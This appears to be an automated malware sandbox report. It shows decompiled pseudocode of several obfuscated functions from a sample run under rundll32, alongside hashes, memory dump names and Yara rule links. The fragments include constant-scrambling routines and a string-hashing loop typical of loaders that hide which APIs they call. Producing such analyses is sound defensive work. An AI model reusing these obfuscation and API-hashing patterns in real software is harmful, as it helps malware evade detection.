                                                                                                                      • Instruction ID: 35eb32f1e52c52b0e67822169ee5c8ba9677966b4353620c49165c21127f77f5
                                                                                                                      • Opcode Fuzzy Hash: 434da03f0d83d3a5d6d93c32cdb42b6ac713b1fcc8cbc1b08d0d3376fbdc5032
                                                                                                                      • Instruction Fuzzy Hash: AC31B0766083118FC714DF29C48146BF7E1FF88318F014B6EE889AB251D774EA09CB9A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 006851BB Relevance: 1.3, Strings: 1, Instructions: 81COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E006851BB() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t72;
				intOrPtr _t83;
				signed int _t87;
				signed int _t88;
				signed int _t89;

				_v28 = _v28 & 0x00000000;
				_v32 = 0x54cf7d;
				_v16 = 0x3835ff;
				_v16 = _v16 >> 0xa;
				_v16 = _v16 * 0x17;
				_v16 = _v16 ^ 0x00095bb8;
				_t72 = 0xe98fb1d;
				_v24 = 0x583681;
				_t87 = 0x44;
				_v24 = _v24 / _t87;
				_v24 = _v24 ^ 0x000eb9f7;
				_v12 = 0x832b1f;
				_v12 = _v12 << 5;
				_v12 = _v12 | 0x242a8544;
				_v12 = _v12 ^ 0x346a2866;
				_v8 = 0x6a77bb;
				_v8 = _v8 >> 0xe;
				_t88 = 0x19;
				_v8 = _v8 / _t88;
				_v8 = _v8 ^ 0x9d9369f0;
				_v8 = _v8 ^ 0x9d908f3a;
				_v20 = 0x4802c8;
				_t89 = 0x21;
				_v20 = _v20 / _t89;
				_v20 = _v20 + 0xffffbfc3;
				_v20 = _v20 ^ 0x000df493;
				do {
					while(_t72 != 0x9835b86) {
						if(_t72 == 0xe98fb1d) {
							_push(_t72);
							_push(_t72);
							 *0x6a3e04 = E00687FF2(0x134);
							_t72 = 0x9835b86;
							continue;
						}
						goto L5;
					}
					_t83 =  *0x6a3e04; // 0x0
					E00690001(_v8, _t83 + 0x18, _v20);
					_t72 = 0x7dce4e4;
					L5:
				} while (_t72 != 0x7dce4e4);
				return 1;
			}















                                                                                                                      0x006851c1
                                                                                                                      0x006851c7
                                                                                                                      0x006851ce
                                                                                                                      0x006851d5
                                                                                                                      0x006851e2
                                                                                                                      0x006851ea
                                                                                                                      0x006851f1
                                                                                                                      0x006851f3
                                                                                                                      0x00685202
                                                                                                                      0x00685207
                                                                                                                      0x0068520c
                                                                                                                      0x00685213
                                                                                                                      0x0068521a
                                                                                                                      0x0068521e
                                                                                                                      0x00685225
                                                                                                                      0x0068522c
                                                                                                                      0x00685233
                                                                                                                      0x0068523a
                                                                                                                      0x0068523f
                                                                                                                      0x00685244
                                                                                                                      0x0068524b
                                                                                                                      0x00685252
                                                                                                                      0x0068525c
                                                                                                                      0x00685264
                                                                                                                      0x00685267
                                                                                                                      0x0068526e
                                                                                                                      0x00685275
                                                                                                                      0x00685275
                                                                                                                      0x0068527b
                                                                                                                      0x0068528b
                                                                                                                      0x0068528c
                                                                                                                      0x00685294
                                                                                                                      0x00685299
                                                                                                                      0x00000000
                                                                                                                      0x00685299
                                                                                                                      0x00000000
                                                                                                                      0x0068527b
                                                                                                                      0x006852a0
                                                                                                                      0x006852ac
                                                                                                                      0x006852b2
                                                                                                                      0x006852b4
                                                                                                                      0x006852b4
                                                                                                                      0x006852c1

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: f(j4
                                                                                                                      • API String ID: 0-3086030595
                                                                                                                      • Opcode ID: 891a4bdec6470d49626589fcada9133bdcc0f62fd14caebab739823ca1cb6001
                                                                                                                      • Instruction ID: 1d0ead0c129f2896bd234912bfbc68fa155e945bacbea7311d6f1cfbcfd616d6
                                                                                                                      • Opcode Fuzzy Hash: 891a4bdec6470d49626589fcada9133bdcc0f62fd14caebab739823ca1cb6001
                                                                                                                      • Instruction Fuzzy Hash: FF314971E01219EBCF08EFAAD9855EEBBB2FB44324F208199E505AB250D7B45F45CF80
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00682051 Relevance: 1.3, Strings: 1, Instructions: 80COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E00682051(void* __edx, signed int _a4, intOrPtr _a8) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				void* _t71;
				signed int _t78;
				signed int _t80;
				signed int _t83;
				signed int _t92;
				signed int _t95;
				signed short* _t97;

				_push(_a8);
				_t97 = _a4;
				_push(_t97);
				E006920B9(_t71);
				_v16 = 0x71ca23;
				_v12 = 0x57f692;
				_v8 = 0;
				_v4 = 0;
				_v20 = 0xd3252c;
				_v20 = _v20 + 0x4351;
				_v20 = _v20 + 0xffff5b79;
				_v20 = _v20 ^ 0x00d2c3f6;
				_a4 = 0xbb067e;
				_t83 = 0x11;
				_a4 = _a4 / _t83;
				_a4 = _a4 >> 8;
				_a4 = _a4 ^ 0xac5d3832;
				_a4 = _a4 ^ 0xac5d3334;
				_a4 = 0xab60c2;
				_a4 = _a4 << 0x10;
				_a4 = _a4 ^ 0x910d5570;
				_a4 = _a4 >> 4;
				_a4 = _a4 ^ 0x0f1cf547;
				if( *_t97 != 0) {
					do {
						_t80 = _v20;
						_a4 = 0xbb067e;
						_a4 = _a4 / _t83;
						_a4 = _a4 >> 8;
						_a4 = _a4 ^ 0xac5d3832;
						_a4 = _a4 ^ 0xac5d3334;
						_a4 = 0xab60c2;
						_a4 = _a4 << 0x10;
						_a4 = _a4 ^ 0x910d5570;
						_a4 = _a4 >> 4;
						_a4 = _a4 ^ 0x0f1cf547;
						_t92 = _v20 << _a4;
						_t78 =  *_t97 & 0x0000ffff;
						_t95 = _v20 << _a4;
						if(_t78 >= 0x41 && _t78 <= 0x5a) {
							_t78 = _t78 + 0x20;
						}
						_v20 = _t78;
						_t97 =  &(_t97[1]);
						_v20 = _v20 + _t92;
						_v20 = _v20 + _t95;
						_v20 = _v20 - _t80;
						_t83 = 0x11;
					} while ( *_t97 != 0);
				}
				return _v20;
			}















                                                                                                                      0x00682056
                                                                                                                      0x0068205a
                                                                                                                      0x0068205e
                                                                                                                      0x00682061
                                                                                                                      0x00682066
                                                                                                                      0x00682070
                                                                                                                      0x0068207b
                                                                                                                      0x00682081
                                                                                                                      0x00682085
                                                                                                                      0x0068208d
                                                                                                                      0x00682095
                                                                                                                      0x0068209d
                                                                                                                      0x006820a5
                                                                                                                      0x006820b3
                                                                                                                      0x006820b6
                                                                                                                      0x006820ba
                                                                                                                      0x006820bf
                                                                                                                      0x006820c7
                                                                                                                      0x006820cf
                                                                                                                      0x006820d7
                                                                                                                      0x006820dc
                                                                                                                      0x006820e4
                                                                                                                      0x006820e9
                                                                                                                      0x006820f4
                                                                                                                      0x006820fc
                                                                                                                      0x006820fc
                                                                                                                      0x00682102
                                                                                                                      0x00682110
                                                                                                                      0x00682114
                                                                                                                      0x00682119
                                                                                                                      0x00682121
                                                                                                                      0x00682131
                                                                                                                      0x00682139
                                                                                                                      0x0068213e
                                                                                                                      0x00682146
                                                                                                                      0x0068214b
                                                                                                                      0x00682153
                                                                                                                      0x0068215d
                                                                                                                      0x00682160
                                                                                                                      0x00682165
                                                                                                                      0x0068216c
                                                                                                                      0x0068216c
                                                                                                                      0x0068216f
                                                                                                                      0x00682173
                                                                                                                      0x00682176
                                                                                                                      0x0068217a
                                                                                                                      0x0068217e
                                                                                                                      0x00682184
                                                                                                                      0x00682185
                                                                                                                      0x0068218f
                                                                                                                      0x00682199

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: QC
                                                                                                                      • API String ID: 0-229404352
                                                                                                                      • Opcode ID: f90a2f0d9400246e94e52ce9e9c4602303884de4e781704f0e0226566f48be9f
                                                                                                                      • Instruction ID: 1bb9fac19006013846ff9ca00b4cb53391d8354f70f727299f18881acd24015a
                                                                                                                      • Opcode Fuzzy Hash: f90a2f0d9400246e94e52ce9e9c4602303884de4e781704f0e0226566f48be9f
                                                                                                                      • Instruction Fuzzy Hash: CB3117715083818BD315DF29C49905BBBE1FFC87A8F548E1DF5C9A2225D3B4C688CB5A
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0069176B Relevance: 1.3, Strings: 1, Instructions: 75COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 88%
                                                                                                                      			E0069176B(void* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _t87;
				signed int _t91;
				signed int _t92;
				signed int _t93;
				void* _t102;
				signed int _t103;

				_v36 = _v36 & 0x00000000;
				_v40 = 0x355323;
				_v24 = 0x6eb9b5;
				_v24 = _v24 + 0x6c21;
				_t102 = __ecx;
				_t91 = 0x64;
				_v24 = _v24 / _t91;
				_v24 = _v24 ^ 0x0005c519;
				_v32 = 0xba69a0;
				_v32 = _v32 << 7;
				_v32 = _v32 ^ 0x5d3c95d0;
				_v20 = 0x99612d;
				_v20 = _v20 | 0x6bf7bfaf;
				_v20 = _v20 + 0x66ac;
				_v20 = _v20 ^ 0x6c036c89;
				_v16 = 0xd72900;
				_v16 = _v16 + 0xffff2462;
				_v16 = _v16 ^ 0xa7b97bfd;
				_v16 = _v16 + 0xffff7578;
				_v16 = _v16 ^ 0xa76084ba;
				_v12 = 0xeb6610;
				_t92 = 0x6f;
				_v12 = _v12 / _t92;
				_v12 = _v12 << 0xf;
				_v12 = _v12 ^ 0x2e835447;
				_v12 = _v12 ^ 0x21f4cf0c;
				_v28 = 0x644f8d;
				_v28 = _v28 << 3;
				_v28 = _v28 << 0xa;
				_v28 = _v28 ^ 0x89f1a004;
				_v8 = 0xbb77ef;
				_t93 = 0x72;
				_v8 = _v8 * 0x3c;
				_v8 = _v8 / _t93;
				_v8 = _v8 << 6;
				_v8 = _v8 ^ 0x18aaba50;
				_t87 = E00690AE0(_v8, _v28);
				_push(_v12);
				_t103 = _t87;
				_push(_t102);
				_push(_t103);
				_push(3);
				E006880E3(_v20, _v16);
				 *((short*)(_t102 + _t103 * 2)) = 0;
				return 0;
			}


















                                                                                                                      0x00691771
                                                                                                                      0x00691777
                                                                                                                      0x0069177e
                                                                                                                      0x00691785
                                                                                                                      0x00691793
                                                                                                                      0x00691795
                                                                                                                      0x0069179a
                                                                                                                      0x0069179f
                                                                                                                      0x006917a6
                                                                                                                      0x006917ad
                                                                                                                      0x006917b1
                                                                                                                      0x006917b8
                                                                                                                      0x006917bf
                                                                                                                      0x006917c6
                                                                                                                      0x006917cd
                                                                                                                      0x006917d4
                                                                                                                      0x006917db
                                                                                                                      0x006917e2
                                                                                                                      0x006917e9
                                                                                                                      0x006917f0
                                                                                                                      0x006917f7
                                                                                                                      0x00691801
                                                                                                                      0x00691806
                                                                                                                      0x0069180b
                                                                                                                      0x0069180f
                                                                                                                      0x00691816
                                                                                                                      0x0069181d
                                                                                                                      0x00691824
                                                                                                                      0x00691828
                                                                                                                      0x0069182c
                                                                                                                      0x00691833
                                                                                                                      0x0069183e
                                                                                                                      0x0069183f
                                                                                                                      0x00691847
                                                                                                                      0x0069184a
                                                                                                                      0x0069184e
                                                                                                                      0x00691861
                                                                                                                      0x00691866
                                                                                                                      0x0069186c
                                                                                                                      0x00691871
                                                                                                                      0x00691872
                                                                                                                      0x00691873
                                                                                                                      0x00691875
                                                                                                                      0x0069187f
                                                                                                                      0x00691888

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #S5
                                                                                                                      • API String ID: 0-40889119
                                                                                                                      • Opcode ID: d638e8f48ed8eccc1823991200f18c017b773c580a1b9d4be8890f89af7529be
                                                                                                                      • Instruction ID: 4c83b0e7f082189cc35e74dc4cd6b382213a6e505aae77c32fefb0f2738bbbc2
                                                                                                                      • Opcode Fuzzy Hash: d638e8f48ed8eccc1823991200f18c017b773c580a1b9d4be8890f89af7529be
                                                                                                                      • Instruction Fuzzy Hash: 213132B2D0020AEBDB48DFE5C94AAEEBBB2FB44304F20809AD515B6250D7B50B15CF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 006A09B5 Relevance: 1.3, Strings: 1, Instructions: 71COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E006A09B5(void* __ecx, signed int __edx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				signed int _t77;
				signed int _t88;
				signed int _t89;

				_v40 = _v40 & 0x00000000;
				_v32 = 4;
				_v52 = 0xab6069;
				_v48 = 0xcf1f96;
				_v44 = 0x29044d;
				_v24 = 0xea6416;
				_v24 = _v24 | 0x7adbff7d;
				_v24 = _v24 ^ 0x5afbff7f;
				_v16 = 0x725236;
				_v16 = _v16 + 0xffff3c91;
				_v16 = _v16 << 7;
				_t88 = 0x2b;
				_v16 = _v16 / _t88;
				_v16 = _v16 ^ 0x015653a2;
				_v12 = 0xbf3984;
				_v12 = _v12 ^ 0x457d3893;
				_t89 = 0x44;
				_v12 = _v12 / _t89;
				_v12 = _v12 + 0x25bc;
				_v12 = _v12 ^ 0x0106bc10;
				_v20 = 0xd655eb;
				_v20 = _v20 | 0x2344b0aa;
				_v20 = _v20 * 0x16;
				_v20 = _v20 ^ 0x147fb4df;
				_v8 = 0x70d8dc;
				_v8 = _v8 + 0xe534;
				_v8 = _v8 ^ 0xb5155b0d;
				_v8 = _v8 >> 7;
				_v8 = _v8 ^ 0x01640b3f;
				_v28 = 0x2d9f47;
				_v28 = _v28 + 0xffffba71;
				_v28 = _v28 ^ 0x002c2593;
				_t77 = E006894EE(_v16, __ecx, _v24 | __edx, __ecx,  &_v36, _v20, _v8,  &_v32, _v28);
				asm("sbb eax, eax");
				return  ~_t77 & _v36;
			}


















                                                                                                                      0x006a09bb
                                                                                                                      0x006a09bf
                                                                                                                      0x006a09c6
                                                                                                                      0x006a09cd
                                                                                                                      0x006a09d4
                                                                                                                      0x006a09db
                                                                                                                      0x006a09e2
                                                                                                                      0x006a09e9
                                                                                                                      0x006a09f0
                                                                                                                      0x006a09f7
                                                                                                                      0x006a09fe
                                                                                                                      0x006a0a09
                                                                                                                      0x006a0a12
                                                                                                                      0x006a0a17
                                                                                                                      0x006a0a1e
                                                                                                                      0x006a0a25
                                                                                                                      0x006a0a2f
                                                                                                                      0x006a0a32
                                                                                                                      0x006a0a35
                                                                                                                      0x006a0a3c
                                                                                                                      0x006a0a43
                                                                                                                      0x006a0a4a
                                                                                                                      0x006a0a55
                                                                                                                      0x006a0a5b
                                                                                                                      0x006a0a62
                                                                                                                      0x006a0a69
                                                                                                                      0x006a0a70
                                                                                                                      0x006a0a77
                                                                                                                      0x006a0a7b
                                                                                                                      0x006a0a82
                                                                                                                      0x006a0a89
                                                                                                                      0x006a0a90
                                                                                                                      0x006a0ab3
                                                                                                                      0x006a0abd
                                                                                                                      0x006a0ac7

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 6Rr
                                                                                                                      • API String ID: 0-3911282678
                                                                                                                      • Opcode ID: b16a44260abee8cda7f594ea7713937b30baf920b598495c2ffeaef3aed9b357
                                                                                                                      • Instruction ID: 5b35b2cc25e1c08cc3870ef09826158cf3b3b89b39341be7cf459152d59635c8
                                                                                                                      • Opcode Fuzzy Hash: b16a44260abee8cda7f594ea7713937b30baf920b598495c2ffeaef3aed9b357
                                                                                                                      • Instruction Fuzzy Hash: E531E1B1D1021EEBDB04CFA5C94A9EEFBB5FB44318F108699D121B6250D3B85B49CF90
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00698519 Relevance: 1.3, Strings: 1, Instructions: 49COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 91%
                                                                                                                      			E00698519(void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t55;

				_push(_a4);
				_push(__ecx);
				E006920B9(_t55);
				_v8 = 0x519131;
				_v8 = _v8 ^ 0xec4619ea;
				_v8 = _v8 + 0x48c3;
				_v8 = _v8 ^ 0x9760daa2;
				_v8 = _v8 ^ 0x7b7f7884;
				_v16 = 0xb689a0;
				_v16 = _v16 + 0x133d;
				_v16 = _v16 ^ 0x00b72bb6;
				_v12 = 0xec38eb;
				_v12 = _v12 * 0x68;
				_v12 = _v12 | 0x70f3e2c1;
				_v12 = _v12 + 0xd290;
				_v12 = _v12 ^ 0x7ff36ca2;
				_v12 = 0x452aa4;
				_v12 = _v12 ^ 0xbb670255;
				_v12 = _v12 >> 1;
				_v12 = _v12 * 0x2d;
				_v12 = _v12 ^ 0x7280165f;
				_v24 = 0xb68a33;
				_v24 = _v24 + 0xffff2941;
				_v24 = _v24 ^ 0x00b92c3b;
				_v12 = 0x340add;
				_v12 = _v12 | 0xd5e1d7f7;
				_v12 = _v12 ^ 0xd5f6168b;
				_v20 = 0x853d17;
				_v20 = _v20 + 0xcd4d;
				_v20 = _v20 ^ 0x00837917;
				return E0068A30C(_v12, _a4, E00681DB9(__ecx), _v20);
			}









                                                                                                                      0x0069851f
                                                                                                                      0x00698523
                                                                                                                      0x00698524
                                                                                                                      0x00698529
                                                                                                                      0x00698530
                                                                                                                      0x00698537
                                                                                                                      0x0069853e
                                                                                                                      0x00698545
                                                                                                                      0x0069854c
                                                                                                                      0x00698553
                                                                                                                      0x0069855a
                                                                                                                      0x00698561
                                                                                                                      0x0069856c
                                                                                                                      0x0069856f
                                                                                                                      0x00698576
                                                                                                                      0x0069857d
                                                                                                                      0x00698584
                                                                                                                      0x0069858b
                                                                                                                      0x00698592
                                                                                                                      0x00698599
                                                                                                                      0x0069859c
                                                                                                                      0x006985a3
                                                                                                                      0x006985aa
                                                                                                                      0x006985b1
                                                                                                                      0x006985b8
                                                                                                                      0x006985bf
                                                                                                                      0x006985c6
                                                                                                                      0x006985cd
                                                                                                                      0x006985d4
                                                                                                                      0x006985db
                                                                                                                      0x00698605

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8
                                                                                                                      • API String ID: 0-719543824
                                                                                                                      • Opcode ID: 12fec3ad41cc48b82a22f75e272f04b08121d484bde9b0f7791330edfee38c34
                                                                                                                      • Instruction ID: d55d70eddff9b0612619582e85e8aab9c42c4396166751580c7a730dc80b4962
                                                                                                                      • Opcode Fuzzy Hash: 12fec3ad41cc48b82a22f75e272f04b08121d484bde9b0f7791330edfee38c34
                                                                                                                      • Instruction Fuzzy Hash: 1321D2B6C00209EBCF88DFE1CA8689EBFB5FF00304F608189E411B6261D3B54B54DB95
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100323E2 Relevance: .4, Instructions: 384COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                      • Instruction ID: 1bfcaf43c27c81d10410876f8fc1d5c1a29ddf16da4e3393733b86403839c423
                                                                                                                      • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                      • Instruction Fuzzy Hash: 2CD15C73C0E9F70E8377C12E506866AEAB2AFC298271FC3E1DCD42F689D2265D1195D0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10031FC2 Relevance: .4, Instructions: 378COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                      • Instruction ID: 82a22fea4dee095689a33f7c41869eea601d71afe1f9cce3cb1ebeaf0be2af07
                                                                                                                      • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                      • Instruction Fuzzy Hash: 0BD16A73C0E9B70E8376C12E54A866BEAB2AFC158271FC3A1DCD02F689D6269D0595D0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10031BB6 Relevance: .4, Instructions: 361COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                      • Instruction ID: 4b1b82cb2a868ffe554c354e232f2920846bc0ab95f092044db9cceed5b195f9
                                                                                                                      • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                      • Instruction Fuzzy Hash: 3BC17F77C1E9B70E8377C12E44A85AAEAB2AFC659271FC3E1CCD43F689D2265D0185D0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 100317E2 Relevance: .4, Instructions: 351COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID:
                                                                                                                      • API String ID:
                                                                                                                      • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                      • Instruction ID: b56b4bdd56439ea2f6f9f3f119f05c546accd6e672066d429c0e352e3a467874
                                                                                                                      • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                      • Instruction Fuzzy Hash: 58C18273D0E9B70E8377C12E44A85AAEEB2AFC558271FC3E1CCD42F289E6265D0595D0
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00684346 Relevance: .2, Instructions: 173COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E00684346(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				void* _t146;
				void* _t165;
				signed int _t170;
				signed int _t171;
				signed int _t172;
